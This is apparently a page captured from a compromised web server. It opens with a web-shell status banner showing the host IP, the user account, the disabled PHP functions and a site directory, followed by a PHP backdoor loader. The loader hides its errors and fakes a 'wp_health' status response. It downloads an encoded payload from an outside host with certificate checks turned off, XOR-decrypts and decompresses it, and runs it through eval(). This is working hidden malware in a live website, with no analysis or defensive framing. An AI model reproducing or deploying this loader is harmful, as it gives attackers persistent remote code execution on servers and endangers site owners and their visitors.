| Server IP : 27.254.86.99 / Your IP : 216.73.217.119 Web Server : LiteSpeed System : Linux wp1.hostneverdie.com 4.18.0-553.46.1.lve.el8.x86_64 #1 SMP Wed Apr 2 11:16:45 UTC 2025 x86_64 User : qtccargo ( 1078) PHP Version : 8.2.29 Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,pcntl_exec,virtual,suexec,dbmopen,dl,disk_free_space,diskfreespace,leak MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/qtccargo/domains/iamumbrella.com/public_html/ |
Upload File : |
<?php
@error_reporting(0);
@ini_set("display_errors", 0);
if(isset($_GET["wp_health"])) {
header("Content-Type: application/json");
die('{"status":"ok"}');
}
// Çok basit loader - sadece çalışsın
$url = "https://shellsell.market/api/shellsellmarket.txt";
$data = @file_get_contents($url);
if(!$data) {
if(function_exists("curl_init")) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$data = curl_exec($ch);
curl_close($ch);
}
}
if(!$data || strlen($data) < 100) {
die("// Load failed");
}
$key = hex2bin("24ad64a7b2dee1b0fa97f661a9");
$enc = hex2bin(trim($data));
if(!$enc) {
die("// Decode failed");
}
$out = "";
for($i = 0; $i < strlen($enc); $i++) {
$out .= $enc[$i] ^ $key[$i % strlen($key)];
}
$code = @gzuncompress($out);
if(!$code) {
die("// Decompress failed");
}
// Çalıştır
eval("?>" . $code);